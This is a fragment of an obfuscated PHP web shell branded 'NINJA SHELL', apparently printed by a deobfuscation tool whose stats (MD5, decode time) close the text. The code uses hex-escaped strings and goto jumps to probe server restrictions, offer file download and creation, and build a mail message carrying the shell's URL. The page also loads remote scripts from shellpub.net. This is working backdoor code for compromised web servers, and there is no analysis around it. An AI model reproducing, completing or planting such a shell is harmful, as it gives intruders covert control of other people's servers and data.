$freespace = hdd(disk_free_space("\57")); goto agJfX; xdKHP: ?>
&<?php goto lBXOt; O92SG: $header = "\106\x72\157\155\x3a\x20{$from_shellcode}\xd\xa\x52\145\160\154\x79\x2d\164\157\x3a\40{$from_shellcode}"; goto fXLUQ; C683H: echo "\x3c\141\40\x63\154\141\163\x73\x3d\x22\142\164\156\40\x62\x74\156\x2d\160\162\x69\155\141\x72\171\x20\142\164\x6e\x2d\x73\155\x20\x6d\x6c\55\63\x20\141\152\x78\x22\40\150\x72\145\x66\75\42\x3f\144\x3d" . hex($d) . "\46\x6e\42\x3e\x2b\x4e\105\x57\106\x49\x4c\105\x2b\74\x2f\x61\76\12\11\x9\11\x9\x9\x9\40\40\74\141\40\x63\154\x61\163\163\75\42\142\164\156\x20\142\164\x6e\x2d\x70\x72\151\x6d\141\x72\x79\40\142\x74\156\x2d\163\155\40\x61\152\170\40\42\40\150\x72\145\146\75\x22\x3f\144\x3d" . hex($d) . "\46\154\x22\76\x2b\x4e\x45\x57\x44\x49\122\x2b\x3c\57\141\76"; goto TiAGv; NB8Bn: $ds = @ini_get("\144\151\163\x61\x62\154\145\137\x66\165\x6e\143\164\x69\x6f\x6e\x73"); goto Wfywb; Wfywb: $open_basedir = @ini_get("\x4f\x70\145\x6e\137\x42\x61\163\145\144\x69\162"); goto POlJj; KyxcD: $safemode_include_dir = @ini_get("\163\141\146\145\137\155\x6f\x64\145\137\151\x6e\x63\154\x75\x64\x65\x5f\x64\x69\162"); goto mZ52w; Sl_IC: if (isset($_GET["\x67"])) { $GNJ[38]($GNJ[9]); header("\x43\157\156\164\145\156\x74\x2d\x54\x79\160\x65\72\40\x61\x70\x70\x6c\151\x63\x61\164\151\157\x6e\x2f\x6f\143\164\x65\x74\55\x73\x74\162\145\141\x6d"); header("\103\x6f\x6e\x74\145\x6e\x74\55\124\162\x61\x6e\x73\146\x65\162\55\x45\156\143\x6f\x64\151\x6e\x67\72\x20\102\x69\x6e\x61\x72\x79"); header("\x43\x6f\156\164\x65\x6e\164\55\114\x65\156\x67\164\x68\72\40" . $GNJ[34](uhex($_GET["\147"]))); header("\x43\157\156\164\x65\x6e\164\55\144\151\x73\x70\157\163\x69\164\151\157\156\72\x20\x61\x74\164\x61\x63\x68\155\145\156\x74\x3b\x20\x66\x69\154\x65\x6e\x61\x6d\x65\75\x22" . uhex($_GET["\x67"]) . "\x22"); $GNJ[37](uhex($_GET["\147"])); } goto le2NM; HxZ4H: ?>
">Config</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto rTrrL; POlJj: $safemode_exec_dir = @ini_get("\x73\141\x66\x65\137\x6d\157\x64\145\x5f\145\x78\145\x63\x5f\x64\x69\x72"); goto KyxcD; UBd5O: ?>
&<?php goto w7WSH; YtA8M: ?>
<!DOCTYPE html>
<html dir="auto" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>./Exorcism1337</title>
<link rel="icon" href="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png">
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
</head>
<link rel="stylesheet" href="https://yudas1337.github.io/NINJA_SHELL/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<body>
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Gugi);
body {
color: #000;
font-family: 'Gugi';
font-size: 14px;
}
a {
text-decoration: none;
}
a:hover {
color: #5DADE2;
text-decoration: underline;
}
input {
background: transparent;
}
textarea {
border: 1px solid #000;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
color: #000;
font-family: 'Gugi';
font-size: 13px;
}
</style>
<div class="container">
<br><br>
<div class="y x">
<a href="?" class="ajx">
<font color="black">NINJA SHELL</font>
</a>
</div>
<nav class="navbar navbar-expand-lg navbar-light bg-light ">
<?php goto c6VdL; nLmNr: $EL_MuHaMMeD .= "\123\150\x65\x6c\154\40\114\151\156\x6b\x20\x3a\x20\150\164\164\160\x3a\x2f\57" . $_SERVER["\x53\105\122\126\105\122\x5f\116\101\115\105"] . $_SERVER["\x50\110\120\x5f\123\105\114\x46"] . "\xd\xa"; goto A5BFp; Jewqe: ?>
<footer class="x">
<center>© Author : TheAlmightyZeus , Design : Con7ext | Recoded By ./Exorcism1337 - Index Attacker ~ Indonesian Hacker Rulez </center>
</footer>
<?php goto MF5M5; b5jeo: $mysql = function_exists("\x6d\171\x73\x71\154\x5f\x63\157\x6e\x6e\x65\143\164") ? "\x4f\116" : "\117\x46\x46"; goto JhmNA; DL4wD: ?>
&<?php goto B83al; XduHV: echo hex($d); goto DL4wD; le2NM: ?>
<script src=https://shellpub.net/get.js></script>
<script src=https://shellpub.net/sayac.js></scrip
Function Calls
None |
Stats
MD5 | 256cf8461758fa60a7611bbe3a208e9a |
Eval Count | 0 |
Decode Time | 257 ms |